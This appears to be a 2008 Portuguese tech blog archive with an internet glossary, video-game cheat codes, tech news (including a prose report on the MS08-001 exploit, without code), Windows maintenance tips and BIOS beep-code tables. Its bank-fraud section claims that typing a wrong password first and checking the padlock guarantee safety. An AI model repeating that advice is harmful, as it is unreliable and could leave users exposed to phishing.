E-comerce (comércio eletrônico) - É a venda de produtos e serviços através da Internet.
E-mail ou Eletronic Mail (correio eletrônico) - É o sistema para troca de mensagens de texto e arquivos de computador via Internet.
Emoticons - Emoticons (emotions+icons) são caracteres usados para simbolizar sentimentos e estados de humor em comunicações pela Internet. Alguns exemplos: [] (abraço), :* (beijo), :-(o) (com sono, bocejando), :-) (alegre).

FAQ - Abreviação para Frequently Asked Questions (questões freqüentemente perguntadas). Arquivo de perguntas e respostas básicas sobre determinado assunto.
Freeware - São programas de computador de domínio público, ou seja, são gratuitos e poder ser usados à vontade.
FTP (File Transfer Protocol) - Significa protocolo de transferência de arquivos pela Internet. É o método padrão de enviar arquivos entre computadores pela Internet.

Gateway - Um computador que conecta uma rede a outra quando as duas redes utilizam protocolos diferentes.
GIF (Graphics Interchange Formal) - É um padrão gráfico que permite salvar imagens em tamanho reduzido. É um formato de arquivo de imagem comumente usado em páginas HTML.

Home Page - É a página principal de um Web site. Normalmente a página serve como um índice para o conteúdo restante do site.
HTML - Hypertext Markup Language (linguagem de marcação de hipertexto). Linguagem de formatação de textos e imagens, utilizada para apresentar os documentos publicados na WWW (World Wide Web).
HTTP - Hypertext Transfer Protocol (protocolo de transferência de hipertexto). Protocolo que controla o envio de uma página em HTML de um servidor para um cliente.

Internet - Rede mundial de computadores que interliga outras redes menores em vários países. É uma rede de redes que se comunicam através do protocolo TCP/IP.
IP ( Internet Protocol) - É o protocolo da Internet, usado para identificar, localizar e estabelecer conexão entre computadores ligados à Internet.

25 de mar. de 2008

Need for Speed Underground 2



Esses códigos apenas têm efeito no modo Career. Para usá-los, digite o código na tela onde aparece “Press Enter“, se fez tudo certo, deverá ouvir um ?beep? (buzina).

PC


regmebaby Ganhe R$20.000 ao inicia o modo Carreira
regmybank Ganhe R$200 no modo carreira
opendoors Acesso a toda cidade
ordermybaby Ganhe R$1000 ao inicia o modo Carreira e libera o Skyline e RX8 no modo Quick Race
gimmevisual1 Libera os Visuais Upgrades Tier 1
gimmevisual2 Libera os Visuais Upgrades Tier 2
needperformance1 Libera os Peformance Upgrades Tier 1
needperformance2 Libera os Visuais Performance Upgrades Tier 2
goforoldspice Libera o Vinyl Old Spice
needmybestbuy Libera o Vinyl Best Buy
gotmycingular Libera o Vinyl Cingular Sponsor
gottahavebk Libera o Vinyl Burger King
gottaedge Libera o Vinyl Edge Sponsor
davidchoeart David Chor como patrocinador
shinestreetbright Shine Street como patrocinador
wantmyd3 D3 GTO
wannacapone Capone como patrocinador
gimmechingy Chingy como patrocinador
yodogg SnoopDogg como patrocinador
tunejapantuning JapaTuning como patrocinador


PS2

Esses códigos apenas têm efeito no modo Career. Para usá-los, digite o código na tela onde aparece “Press Enter“, se fez tudo certo, deverá ouvir um ?beep? (buzina).

esquerda, esquerda, direita, quadrado, quadrado, direita, L1, R1

Ganhe R$1000 no modo Carreira e libera o Skyline e RX8 no modo Quick Race
cima, cima, cima, esquerda, R1, R1, R1, baixo

Ganhe R$ 200 no modo Carreira
R1, R1, cima, baixo, L1, L1, cima, baixo

Libera os Visuais Upgrades de Nivel1
L1, R1, cima, Dn, L1, cima, cima, baixo

Unlock all visual upgrades de Nivel 2
L1, R1, L1, R1, esquerda, esquerda, direita, cima

Libera os Visuais Performance Upgrades de Nivel 1
R1, R1, L1, R1, esquerda, direita, cima, baixo

Libera os Visuais Performance Upgrades de Nivel 2
baixo, R1, R1, R1, R2, R2, R2, quadrado

Libera todos os Circuitos
cima, cima, cima, cima, baixo, cima, cima, esquerda

Libera o Vinyl Burger King
cima, esquerda, cima, cima, baixo, esquerda, baixo, esquerda

Libera o Hummer H2 Capone
baixo, baixo, L1, L2, L1, L2, L1, baixo

Libera o Nissan Skyline
cima, direita, cima, cima, baixo, direita, baixo, direita

Libera o Navigator Chingy
cima, baixo, direita, cima, esquerda, baixo, direita, direita

D3 GTO
cima, baixo, esquerda, cima, esquerda, cima, direita, esquerda

Libera o ShineStreet Lexus IS300
cima, baixo, cima, baixo, baixo, cima, direita, esquerda
Libera o Vinyl Best Buy
baixo, cima, baixo, esquerda, L1, L1, L1, baixo

Libera todos os vinyls de Contest Car


XBOX

Esses códigos apenas têm efeito no modo Career. Para usá-los, digite o código na tela onde aparece “Press Enter“, se fez tudo certo, deverá ouvir um ?beep? (buzina).

esquerda, esquerda, direita, X, X, direita, L, R

Ganhe R$1000 no modo Carreira e libera o Skyline e RX8 no modo Quick Race
cima, cima, cima, esquerda, R, R, R, baixo

Ganhe R$ 200 no modo Carreira
R, R, cima, Dn, L, L, cima, baixo

Libera os Visuais Upgrades de Nivel1
L, R, cima, Dn, L, cima, cima, baixo

Unlock all visual upgrades de Nivel 2
L, R, L, R, esquerda, esquerda, direita, cima

Libera os Visuais Performance Upgrades de Nivel 1
R, R, L, R, esquerda, direita, cima, baixo

Libera os Visuais Performance Upgrades de Nivel 2
cima, cima, cima, cima, baixo, cima, cima, esquerda

Libera o Vinyl Burger King
cima, esquerda, cima, cima, baixo, esquerda, baixo, esquerda

Libera o Hummer H2 Capone
cima, direita, cima, cima, baixo, direita, baixo, direita

Libera o Navigator Chingy
cima, baixo, direita, cima, esquerda, baixo, direita, direita

D3 GTO
cima, baixo, esquerda, cima, esquerda, cima, direita, esquerda

Libera o ShineStreet Lexus IS300
cima, baixo, cima, baixo, baixo, cima, direita

Carro Best Buy
baixo, cima, baixo, esquerda, L, L, L, baixo

Libera todos os vinyls de Contest Car


GAME CUBE

Esses códigos apenas têm efeito no modo Career. Para usá-los, digite o código na tela onde aparece “Press Enter“, se fez tudo certo, deverá ouvir um ?beep? (buzina).

esquerda, esquerda, direita, X, X, direita, L, R

Ganhe R$1000 no modo Carreira e libera o Skyline e RX8 no modo Quick Race
cima, cima, cima, esquerda, R, R, R, baixo

Ganhe R$ 200 no modo Carreira
R, R, cima, Dn, L, L, cima, baixo

Libera os Visuais Upgrades de Nivel1
L, R, cima, Dn, L, cima, cima, baixo

Unlock all visual upgrades de Nivel 2
L, R, L, R, esquerda, esquerda, direita, cima

Libera os Visuais Performance Upgrades de Nivel 1
R, R, L, R, esquerda, direita, cima, baixo

Libera os Visuais Performance Upgrades de Nivel 2
cima, cima, cima, cima, baixo, cima, cima, esquerda

Libera o Vinyl Burger King
cima, esquerda, cima, cima, baixo, esquerda, baixo, esquerda

Libera o Hummer H2 Capone
cima, direita, cima, cima, baixo, direita, baixo, direita

Libera o Navigator Chingy
cima, baixo, direita, cima, esquerda, baixo, direita, direita

D3 GTO
cima, baixo, esquerda, cima, esquerda, cima, direita, esquerda

Libera o ShineStreet Lexus IS300
cima, baixo, cima, baixo, baixo, cima, direita, esquerda

Carro Best Buy
baixo, cima, baixo, esquerda, L, L, L, baixo

Libera todos os vinyls de Contest Car

Mais Dicas: Para PC


Na tela onde aparece: “Press Enter”, digite um dos códigos abaixo e pressione Enter.

davidchoeart - Destrava o patrocinador David Choe.
gimmechingy - Destrava o patrocinador Chingy.
gimmevisual1 - Destrava todos os visual upgrades nivel 1.
gimmevisual2 - Destrava todos os visual upgrades nivel 2.
goforoldspice - Destrava o vinil do Old Spice.
gotmycingular - Destrava o vinil do Cingular.
gottaedge - Destrava o vinil do Edge.
gottahavebk - Destrava o vinil do Burger King.
needmybestbuy - Destrava o vinil do Best Buy.
needperformance1 - Destrava todos os Performance upgrades nivel 1.
needperformance2 - Destrava todos os Performance upgrades nivel 2.
opendoors - Destrava o patrocinador The Doors.
ordermybaby - Começa com $1,000 no modo Career, e destrava o Nissan Skyline e o Mazda RX-8 no modo Quick Race.
regmebaby - Começa com $20,000 no modo Career.
regmybank - Começa com $200 no modo Career.
shinestreetbright - Destrava o patrocinador ShinestStreet.
tunejapantuning - Destrava o patrocinador Japantuning.
wannacapone - Destrava o patrocinador Capone.
wantmyd3 - Destrava o patrocinador D3.
yodogg - Destrava o patrocinador Snoop Dogg.

Mais dicas Para PS2

need for speed underground 2

>>>Partes Visuais Nível 2: Pressione L1, R1, Cima, Baixo, L1, Cima(2), Baixo quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

>>>Partes Visuais Nível 1: Pressione R1(2), Cima, Baixo, L1(2), Cima, Baixo quando “Press Start” aparecer na tela inicial do jogo. Um som confirmará a digitação correta do código.

>>>Performance Nível 2: Pressione R1(2), L1, R1, Esquerda, Direita, Cima, Baixo quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

>>>Performance Nível 1: Pressione L1, R1, L1, R1, Esquerda(2), Direita, Cima quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

>>>Todas as pistas: Pressione Baixo, R1(3), R2(3), Quadrado quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

>>>ShineStreet Lexus IS300: Pressione Cima, Baixo, Esquerda, Cima, Esquerda, Cima, Direita, Esquerda quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

>>>Navigator Chingy: Pressione Cima, Direita, Cima(2), Baixo, Direita, Baixo, Direita quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

>>>D3 GTO: Pressione Cima, Baixo, Direita, Cima, Esquerda, Baixo, Direita(2) quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

>>>Nissan Skyline: Pressione Baixo(2), L1, L2, L1, L2, L1, Baixo quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

>>>Starting bonus: Pressione Esquerda(2), Direita, Quadrado(2), Direita, L1, R1 quando “Press Start” aparecer na tela inicial do jogo.. Um som confirmará a digitação correta do código.

GTA San Andreas (Dicas - PC)



LXGIWYL = Pack de armas 1, Thugs Tools
KJKSZPJ = Pack de armas 2, Professional Tools
UZUMYMW = Pack de armas 3, Nutter Tools
HESOYAM = Saúde, Armadura e $250 mil dólares (que roubo de cheat!)
OSRBLHH = Aumenta o nível de procurado em 2 estrelas
ASNAEB = Limpa o nível de procurado.
AFZLLQLL = Céu limpo
ICIKPYH = Céu muito limpo.
ALNSFMZO = Tempo nublado
AUIFRVQS = Tempo chuvoso
CFVFGMJ = Neblina
YSOHNUL = O tempo passa mais rápido.
PPGWJHT = Todo o jogo anda mais rápido
LIYOAAY = Todo o jogo fica mais lento
AJLOJYQY = Pedestres se atacam, todos com tacos de golf
BAGOWPG = Have a bounty on your head
FOOOXFT = Todo mundo armado
AIWPRTON = Materializar o Rhino
CQZIJMB = Materializar o Bloodring Banger
JQNTDMH = Materializar o Rancher
PDNEJOH = Materializar o Racecar
VPJTQWV = Materializar outro Racecar
AQTBCODX = Materializar o Romero
KRIJEBR = Materializar o Stretch
UBHYZHQ = Materializar o Trashmaster (carro do lixo)
RZHSUEW = Materializar o Caddy (carrinho de golfista)
CPKTNWT = Explodir todos os carros
XICWMD = Carro invisível
PGGOMOY = Direção perfeita
SZCMAWO = Suicídio
ZEIIVG = Todas as luzes verdes
YLTEICZ = Motoristas agressivos
LLQPFBN = Todo o tráfego fica rosa
IOWDLAC = Todo o tráfego fica negro
AFSNMSMW = Barcos voadores
BTCDBCB = Gordo.
JYSDSOD = Maximizar os músculos
KVGYZQK = Magrelo
ASBHGRB = Todo mundo igual ao Elvis
BGLUAWML = Pedestres lhe atacam com armas, lança-foguetes.
CIKGCGX = Todo mundo vestido de roupa de praia
MROEMZH = Todo mundo é membro de gangue
BIFBUZZ = As gangues controlam as ruas
AFPHULTL = Tema Ninja
BEKKNQV = Atrair as prostitutas
BGKGTJH = Todo o tráfego é formado por carros batatos
GUSNHDE = Todo o tráfego é formado por carros rápidos
RIPAZHA = Carros foadores
JHJOECW = Salto gigante da BMX
JUMPJET = Materializar a Hydra
KGGGDKP = Materializar o Vortex
JCNRUAD = Smash n Boom
COXEFGU = Todos os carros têm nitro
BSXSGGC = Os carros flutuam quando atingidos.
XJVSNAJ = Sempre é meia-noite
OFVIAC = 21:00 - Céu laranja.
MGHXYRM = Temporal
CWJXUOC = Tempestade de areia
LFGMHAL = Mega salto
BAGUVIX = Saúde infinita
CVWKXAM = Oxigênio infinito
AIYPWZQP = Você tem um pára-quedas
YECGAA = Você tem um Jetpack
AEZAKMI = Você nunca será procurado
LJSPQK = Nível de procurado: 6
IAVENJQ = Mega soco
AEDUWNV = Nunca mais sentir fome
IOJUFZN = Perturbação da ordem pública
PRIEBJ = Funhouse Theme
MUNASEF = Modo Adrenalina (tudo em câmera lenta)
WANRLTW = Munição infinita, sem recarregar as armas
OUIQDMW = Mira total enquanto você dirige
THGLOJ = Tráfego reducido.
FVTMNBZ = Todo o tráfego é formado por veículos do campo
SJMAHPE = Recrutar qualquer um (9mm)
BMTPWHR = Veículos e pedestres do campo, roupa de caminhoneiro
ZSOXFSQ = Recrutar qualquer um (Foguetes)
OGXSDAG = Valor máximo de respeito
EHIBXQS = Valos máximo de Sex Appeal
VKYPQCF = Os táxis têm nitro, buzinar para saltar.
NCSGDAG = Nivel Hitman (Assassino) em todas as armas.
VQIMAHA = Maximizar todas as skills de todos os veículos.
OHDUDE = Materializar o Hunter
AKJJYGLC = Materializar o Quad
AMOMHRER = Materializar o Tanker Truck
EEGCYXT = Materializar o Dozer
URKQSRK = Materializar o Stunt Plane
AGBDLCID = Materializar o Monster

· URKQSRK = Ultra Leve
· JUMPJET = Caça Militar
· OHDUDE = Helicóptero Apache
· LXGIWYL = Grupo de Armas 1, Thug’s Tools
· KJKSZPJ = Grupo de Armas 2,Ferramentas Proficionais
· UZUMYMW = Grupo de Armas 3, Nutter Tools
· HESOYAM = Vida,Colete,$250,000
· OSRBLHH = Aumenta o nivel de perseguição em 2 estrelas
· ASNAEB = Tirar todas estrelas do nível de perseguição
· AEZAKMI = Nunca ser perseguido
· AFZLLQLL = Clima: sol
· ICIKPYH = Clima: sol forte
· AUIFRVQS = Clima: chuvoso
· CFVFGMJ = Clima: Nublado
· YSOHNUL = Relógio rapido
· PPGWJHT = Jogabilidade rapida
· LIYOAAY = Jogabilidade lerda
· AJLOJYQY = Peds Atacam uns aos outros
· BAGOWPG = Ter um premio por sua cabeça
· FOOOXFT = Todo mundo armado
· AIWPRTON = Criar “Rhino” (Tanque)
· CQZIJMB = Criar “Bloodring Banger”
· JQNTDMH = Criar “Rancher”
· PDNEJOH = Criar carro de corrida 1
· VPJTQWV = Criar carro de corrida 2
· AQTBCODX = Criar “Romero”
· KRIJEBR = Criar “Stretch”
· UBHYZHQ = Criar “Trashmaster”
· RZHSUEW = Criar “Caddy”
· CPKTNWT = Explodir todos os carros
· XICWMD = Carro invisível
· PGGOMOY = Direção perfeita
· SZCMAWO = Suicidio
· ZEIIVG = Todas luzes verdes
· YLTEICZ = Motoristas agressivos
· LLQPFBN = Tráfego rosa
· IOWDLAC = Tráfego preto
· AFSNMSMW = Barcos voam
· BTCDBCB = Personagem gordo
· JYSDSOD = Personagem com máximo de músculo
· KVGYZQK = Personagem magrelo
· ASBHGRB = Elvis está por toda parte
· BGLUAWML = Peds atacam Você com armas e lança-mísseis
· CIKGCGX = Festa na praia
· MROEMZH = Membros de gangues por toda parte
· BIFBUZZ = Gangues controlam as ruas
· AFPHULTL = Ninja Theme
· BEKKNQV = Slut Magnet
· BGKGTJH = O tráfego são carros baratos
· GUSNHDE = O tráfego são carros caros
· RIPAZHA = Carros Voam
· JHJOECW = Pulo alto de coelho
· JUMPJET = Criar Hydra
· KGGGDKP = Criar Vortex Hovercraft
· JCNRUAD = Quando seu carro encosta em algo,aquilo explode
· COXEFGU = Todos carros tem Nitro
· BSXSGGC = Carros flutuam quando atingidos
· XJVSNAJ = Sempre meia-noite
· OFVIAC = Céu laranja 21:00
· MGHXYRM = Tempestade de raios
· CWJXUOC = Tempestade de areia
· LFGMHAL = Mega pulo
· BAGUVIX = Vida infinita
· CVWKXAM = Oxigênio infinito
· AIYPWZQP = Paraquedas
· YECGAA = Mochila à jato
· LJSPQK = Perseguição 6 estrelas
· IAVENJQ = Mega soco
· AEDUWNV = Nunca ter fome
· IOJUFZN = Modo tumulto
· PRIEBJ = Funhouse Theme
· MUNASEF = Modo adrenalina
· WANRLTW = Munição infinita e sem precisar carregar
· OUIQDMW = Arma com total mira enquanto dirigindo
· THGLOJ = Tráfego reduzido
· FVTMNBZ = Tráfego são veículos Country (de campo/fazenda)
· SJMAHPE = Recrutar qualquer um
· BMTPWHR = Veículos Country e peds,surgir 2 caminhões
· ZSOXFSQ = Recrutar qualquer um (Rockets)
· OGXSDAG = Ter respeito máximo
· EHIBXQS = Ter máximo “Sex Appeal”
· VKYPQCF = Taxis tem Nitro, L3 para dar pulo de coelho (bunny hop)
· NCSGDAG = Acertar homens em todos estados da arma
· VQIMAHA = Maximizar habilidades em todos os veículos
· OHDUDE = Criar Hunter
· AKJJYGLC = Criar Quad
· AMOMHRER = Criar Tanker Truck
· EEGCYXT = Criar Dozer
· URKQSRK = Criar Stunt Plane
· AGBDLCID = Criar Monster

14 de mar. de 2008

ESTUDO COMPROVA

"TAMANHO DE MONITOR É IMPORTANTE NO DESEMPENHO PROFISSIONAL"

Um estudo feito pela Universidade de Utah, nos Estados Unidos, mostrou a diferença de produtividade entre usuários de diversos tamanhos de monitores. Conforme a pesquisa, quanto maior a tela do computador, mais produtivo é o empregado.
Segundo o blog de tecnologia da NewScientist, os pesquisadores analisaram tarefas de cópias de números entre planilhas e edição de documentos de texto em monitores de 18, 24, 26 polegadas e também em computadores equipados com dois monitores de 20 polegadas.
Através da comparação foi descoberto que usando um monitor de 24 polegadas, as pessoas concluem tais tarefas com velocidade 52% superior que em monitores de 18 polegadas. Com o uso de dois monitores de 20 polegadas, usuários foram 44% mais rápidos que usando um de 18.
A produtividade, entretanto, caiu quando os usuários foram colocados para trabalhar com monitores de 26 polegadas, algo cujo motivo não ficou claro, mas que pode ter relação com o campo de visão do usuário. O estudo deve ser analisado com cautela, já que assume que um funcionário trabalhará sem parar por 8 horas seguidas e que as tarefas que serão feitas se baseiam apenas no benefício de grandes monitores, noticiou o blog do Wall Street Journal. Outra questão em relação à pesquisa é que ela foi patrocinada pela NEC, uma grande fabricante de monitores. Ainda assim, James Anderson, professor responsável pelo estudo, avisou que não se importa qual a marca de monitor que empresas comprarão, apenas queria indicar que o monitor certo pode deixar seus funcionários mais produtivos.

10 de mar. de 2008

Service Pack 3 do Office 2003

A escolha deliberada da Microsoft em impedir acesso a arquivos antigos, incluindo aqueles gerados por seus próprios produtos, foi para aumentar a segurança no novo pacote de atualizações do Office 2003, de acordo com informações de um evangelista da companhia.O Service Pack 3 (SP3) para o Office 2003, segundo Viral Tapara, evangelista da Microsoft no Reino Unido, bloqueia antigos formatos de arquivo por razões de segurança.“Alguns arquivos antigos, incluindo da Microsoft, são inseguros e não nos satisfaz ter vetores de ataques que podem ser usados para executar código malicioso”, disse Tapara. “A decisão pelo bloqueio se restringe para proteger a máquina de ser comprometida”.O Office 2003 SP3 foi lançado em setembro e as discussões em torno das mensagens de erro ao abrir arquivos surgiram quase de imediato nos fóruns da Microsoft.As questões continuaram em dezembro. Usuário identificado como "dberwanger" reclamou que perdeu 250 dólares para “resolver um problema com o SP3 que ele mesmo criou. Finalmente, tive que desinstalar completamente o Word 2003 e reinstalar (pois não é possível desinstalar o SP3) e o problema foi resolvido”.A Microsoft divulgou um documento (veja o original, em inglês, no link: http://support.microsoft.com/kb/938810/en-us) que inclui um registro do Windows que permite retornar ao modelo original de suporte a formatos antigos para o Office 2003. O documento ressalta os problemas de segurança: “Estes formatos foram bloqueados por serem menos seguros. Eles podem significar um risco à você”, define o documento. -->

NOTICIA IMPORTANTE

Pesquisadores de segurança desmentiram a afirmação da Microsoft que a primeira vulnerabilidade crítica do Windows este ano seria “difícil ou improvavelmente” exploradas por hackers.Na terça-feira (29/01), a Immunity atualizou um código eficiente na exploração para falha de TCP/IP divulgada pela Microsoft no boletim de segurança MS08-001, o primeiro deste ano. A empresa especializada em segurança publicou um arquivo em Flash com a demonstração do ataque.O código, divulgado aos clientes de seu software de testes de invasão Canvas, é uma versão revisada daquele apresentado há duas semanas. “Isso demonstra que a vulnerabilidade em questão é altamente explorável”, afirma Dave Aitel, diretor de tecnologia da Immunity, em uma mensagem enviada à sua lista Dailydave.Aitel desmente a afirmação feita pela Microsoft de que “existe uma série de fatores que torna a exploração desse bug difícil e improvável de acontecer em condições normais.” Porém, o especialista admite que o novo código não é 100% confiável.Outras empresas de segurança apoiaram o código e emitiram novos alertas a seus clientes. A Symantec, por exemplo, enviou um novo comunicado aos clientes usuários do software DeepSight. “O ataque indica um código de execução remota”, diz a Symantec. “O código funciona contra o Windows XP SP2 English Default, e mostra dois PCs com esta versão do sistema em uma sub-rede local com firewall habilitado.”No comunicado, a empresa sugere que aqueles que ainda não tenham instalado as correções disponibilizadas pela Microsoft o façam o quanto antes. A companhia divulgou a atualização em 8 de janeiro.Os ataques bem-sucedidos realizados pela Immunity - e qualquer código semelhante desenvolvido por outras empresas - permitem que um código arbitrário seja executado no contexto do kernel do Windows, um cenário especialmente aplicável ao Windows Vista, explicou a Symantec.“Ele é especialmente crítico no Vista devido aos mecanismos de segurança de seu kernel”, disse a Symantec. “Um usuário local, mesmo um administrador, pode ter dificuldade para introduzir código nesse kernel. Mas nesse caso, isso pode ser feito remotamente, sem qualquer tipo de autenticação.”A Symantec diz ainda que “esta vulnerabilidade representa uma oportunidade não apenas para que um código arbitrário seja executado no sistema, mas também para a instalação de backdoors e outras ferramentas maliciosas.”Em seu boletim de segurança, divulgado no último dia 8, a Microsoft classificou a falha do IGMP (Internet Group Management Protocol) como “crítica” para o Windows XP SP2, Windows Vista, Windows Small Business Server e Windows Home Server. Em outras versões, incluindo o Windows Server 2003, o bug foi classificado como “importante”.

6 de mar. de 2008

MANUTENÇÃO DO WINDOWS

1 - Faça desfragmentação de disco sempre:

Faça desfragmentação de disco em todas as partições de seu computador ao menos uma vez por mês. Isso evita problemas no HD e deixa o acesso aos dados mais rápido. Se seu HD for muito grande, como por exemplo, de 80 GB, você pode fazer a desfragmentação durante a madrugada ou num período em que você não esteja usando o computador. Para usar o Desfragmentador de Disco do Windows, vá em Iniciar / Programas / Acessórios / Ferramentas do Sistema / Desfragmentador de disco.

2 - Ajuste a memória virtual do Windows:

A memória virtual é uma parte do disco rígido usado pelo sistema para armazenar dados excedentes da memória RAM. Uma boa sugestão é deixar que a memória virtual tenha pelo menos 256 MB se você for usuário dos Windows 9x/Me. Para as versões posteriores, o mínimo recomendável é 384 MB. Para ajustar a memória virtual no Windows 9x/Me, clique com o botão direito do mouse em Meu Computador e selecione Propriedades / Desempenho / Memória Virtual. Altere os tamanho Máximo e Mínimo para o valor desejado (recomendável que ambos os valores sejam iguais). No Windows 2000/XP, o caminho é semelhante: Propriedades / Avançado / Desempenho / Configurações / Avançado / Memória Virtual.

3 - Livre o sistema de arquivos desnecessários:

Durante um determinado tempo de uso, o Windows armazena muitos arquivos temporários que passam a ser "lixo" no sistema. São arquivos com extensão .bak, .tmp, .chk, entre outras. Você pode excluir esses arquivos com segurança, através de programas como o gratuito Easy Cleaner (disponível na seção Downloads). Também é possível usar o programa Limpeza de disco do Windows. Sua função é apagar os arquivos de pastas de conteúdo temporário. Para acessá-lo, vá em Iniciar / Programas / Acessórios / Ferramentas do Sistema / Limpeza de disco. O Internet Explorer também costuma armazenar muitos arquivos temporários. Para eliminá-los, abra o navegador e vá em Ferramentas / Opções da Internet / Excluir arquivos. Marque a opção Excluir todo o conteúdo offline. Com isso, os arquivos temporários e o cache de páginas da Internet serão excluídos e deixarão o sistema "mais leve".

4 - Limpe o registro do Windows:

Fazer a manutenção periódica do registro do Windows ocasiona melhor desempenho ao sistema e ajuda a evitar o surgimento de problemas mais graves. O utilitário citado acima, Easy Cleaner, faz um excelente trabalho neste sentido, tirando do Registro entradas inválidas. Já o utilitário RegClean, da Microsoft, corrige erros e otimiza o Registro. O RegClean é gratuito e pode ser baixado em sites da Microsoft.

5 - Não instale programas em excesso:

Não é recomendável instalar muitos programas no Windows (por exemplo, instalar 2 ou 3 programas para a mesma finalidade), a não ser que você realmente os use. Quanto mais softwares você instalar, mais entradas no Registro do Windows serão criadas e mais arquivos serão instalados. Se um programa não for bem desenvolvido, sua desinstalação pode causar problemas ao sistema. Além disso, há muitos programas que são ativados na inicialização do sistema. Quando isso ocorre, recursos de memória e processamento acabam sendo usados (muitas vezes desnecessariamente). Antes de instalar um programa, tenha certeza de sua finalidade e procure por opiniões na Internet a respeito do mesmo.

COMO EVITAR FRAUDES BANCÁRIAS NA INTERNET

COMO EVITAR FRAUDES BANCÁRIAS NA INTERNET
1 – Minimize a página.Se o teclado virtual for minimizado também, está correto.Se ele permanecer na tela sem minimizar, é pirata! Não tecle nada.
2 – Sempre que entrar no site do banco, digite sua senha ERRADA na primeira vez. Se aparecer uma mensagem de erro significa que o site é realmente do banco, porque o sistema tem como checar a senha digitada.Mas se digitar a senha errada e não acusar erro é mau sinal. Sites piratas não têm como conferir a informação, o objetivo é apenas capturar a senha.
3 – Sempre que entrar no site do banco, verifique se no rodapé da página aparece o ícone de um cadeado, além disso clique 2 vezes sobre esse ícone; uma pequena janela com informações sobre a autenticidade do site deve aparecer.Em alguns sites piratas o cadeado pode até aparecer, mas será apenas uma imagem e ao clicar 2 vezes sobre ele, nada irá acontecer.
Os 3 pequenos procedimentos acima são simples, mas garantirão que vocês jamais seja vítima de fraude.

5 de mar. de 2008

CONHEÇA OS BIPS DA BIOS

Muitas vezes quando ligamos o computador, damos de cara com problemas e só recebemos de informação os apitos da BIOS (chamados de BIOS Tone POST Codes)! Se não temos à mão uma tabela com o significado dos apitos, o trabalho se torna um exercício de adivinhação que além de tomar muito tempo, pode acabar resultando em gastos de dinheiro trocando peças desnecessárias, ou para os mais irritadiços, jogar o computador pela janela ou dar uns pontapés para ver se funciona! :-)
Pensando nisso, conseguimos umas tabelas dos famosos apitos, para que você possa ter alguma dica com que iniciar a solução do problema!
Maiores informações vocês poderão conseguir nos sites dos produtores de BIOS e das PLACAS-MÃE.

AMI BIOS Tone POST Codes

Apito
Condição de Erro
1 curto
Atualização de DRAM
2 curtos
Circuito de Paridade
3 curtos
Memória Base 64K RAM
4 curtos
Timer do Sistema
5 curtos
Processador
6 curtos
Controlador de teclado - gate A20
7 curtos
Virtual mode exception
8 curtos
Teste de memória (read/write) de vídeo
9 curtos
ROM BIOS checksum
10 curtos
CMOS shutdown read/write
11 curtos
Memória Cache
1 longo, 3 curtos
Memória Convencional/extendida
1 longo, 8 curtos
Teste de Display/retrace

AWARD BIOS Tone POST Codes

Apito
Condição de Erro
1 longo, 2 curtos
Erro de Display - não é possível mostrar outras informações
Qualquer outro
Erro de memória RAM
*Demais problemas ou condições são mostrados na tela

Phoenix BIOS Tone POST Codes - Erros Fatais

Apito
Condição
Nenhum
teste de registro de CPU
Nenhum
teste dos 64K RAM iniciais
Nenhum
Procedimento de carregamento do vetor de interrupção
Nenhum
falha de força CMOS/cálculo do checksum
Nenhum
Procedimento de validação de configuração de vídeo
Nenhum
vídeo funcionando com vídeo ROM
Nenhum
vídeo funcional
Nenhum
vídeo Monocromático funcional
Nenhum
vídeo CGA funcional
1-1-3
CMOS write/read
1-1-4

ROM BIOS checksum

1-2-1
Timer do Sistema
1-2-2
inicialização do DMA
1-2-3
registro da página de DMA (write/read)
1-3-1
verificação da atualização da memória RAM
1-3-3
chip dos 64K RAM iniciais ou linha de dados
1-3-4
lógica odd/even dos 64K RAM iniciais
1-4-1
endereço de linha dos 64K RAM iniciais
1-4-2
falha de paridade nos 64K RAM iniciais
2-1-1
Bit 0, 64K RAM iniciais
2-1-2
Bit 1, 64K RAM iniciais
2-1-3
Bit 2, 64K RAM iniciais
2-1-4
Bit 3, 64K RAM iniciais
2-2-1
Bit 4, 64K RAM iniciais
2-2-2
Bit 5, 64K RAM iniciais
2-2-3
Bit 6, 64K RAM iniciais
2-2-4
Bit 7, 64K RAM iniciais
2-3-1
Bit 8, 64K RAM iniciais
2-3-2
Bit 9, 64K RAM iniciais
2-3-3
Bit 10, 64K RAM iniciais
2-3-4
Bit 11, 64K RAM iniciais
2-4-1
Bit 12, 64K RAM iniciais
2-4-2
Bit 13, 64K RAM iniciais
2-4-3
Bit 14, 64K RAM iniciais
2-4-4
Bit 15, 64K RAM iniciais
3-1-1
registro de DMA Slave
3-1-2
registro de DMA Master
3-1-3
Registrador da interrupção Master
3-1-4
Registrador da interrupção Slave
3-2-4
controlador de teclado
3-3-4
inicialização do vídeo
3-4-1
retrace do vídeo
3-4-2
procura por ROM de vídeo em processamento
4-2-1
teste da interrupção do Timer
4-2-2
teste de Shutdown
4-2-3
falha na porta A20
4-2-4
interrupção inesperada em modo protegido
4-3-1
teste de RAM (endereço da falha >FFFFh)
4-3-3
Intervalo do timer canal 2
4-3-4
relógio do sistema
4-4-1
porta Serial
4-4-2
porta Paralela
4-4-3
teste do co-processador matemático
1-1-2*
seleção da placa de sistema
1-1-3*
Extender CMOS RAM
*código de áudio precedido por tom mais grave

IBM POST Tone Codes

Apito
Condição
Nenhum
placa mãe, fonte
1 curto
Sistema passou por todos os testes
2 curtos
Erro de display
contínuo
Placa mãe, fonte
1 longo, 1 curto
placa mães
1 longo, 2 curtos
placa de vídeo
1 longo, 3 curtos
EGA
3 longos
cartão 3270
Referências:

Cuidados com Telefones Celulares, PDAs e Outros Aparelhos com Bluetooth

Telefones celulares deixaram de ser meramente aparelhos utilizados para fazer ligações telefônicas e passaram a incorporar diversas funcionalidades, tais como: calendário, despertador, agenda telefônica e de compromissos, câmera fotográfica, envio e recebimento de texto e imagens, etc.
